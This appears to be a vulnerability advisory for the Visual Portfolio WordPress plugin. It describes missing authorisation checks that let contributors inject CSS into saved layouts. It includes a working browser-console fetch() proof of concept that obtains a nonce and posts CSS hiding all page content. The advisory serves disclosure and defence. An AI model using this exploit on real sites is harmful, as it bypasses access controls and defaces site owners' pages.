The plugin does not have proper authorisation checks in some of its REST endpoints, allowing users with a role as low as contributor to call them and inject arbitrary CSS in arbitrary saved layouts
The post_id is the ID of a saved layout As a contributor, get a REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce Execute the below command (replacing the _wpnonce value by the nonce retrieved above) in the web developer console of the browser (while still being logged in as a contributor): fetch('/?rest_route=/visual-portfolio/v1/update_layout&_wpnonce=XXXX&post_id=17&data[vp_custom_css]=body{background-image:url(data://image/gif;base64,R0lGODdhKAAoAIABAAAAAP///ywAAAAAKAAoAAACX4yPqcvtD6OctNqLs968GwB4DkheJUSeUxqObCu98CJTtZvaL6quucjoAYfEovGI9M2MrJjwccM9G9FglXpVyJa0LW9n9X635Gy4jOZK02YoW1x5NzNytYWdzOv3/GIBADs=);}div{display:none !important};', { method: 'POST', }).then(response => response.text()) .then(data => console.log(data));
Krzysztof Zając
Krzysztof Zając
Yes
2022-08-15 (about 1 years ago)
2022-08-15 (about 1 years ago)
2023-05-08 (about 4 months ago)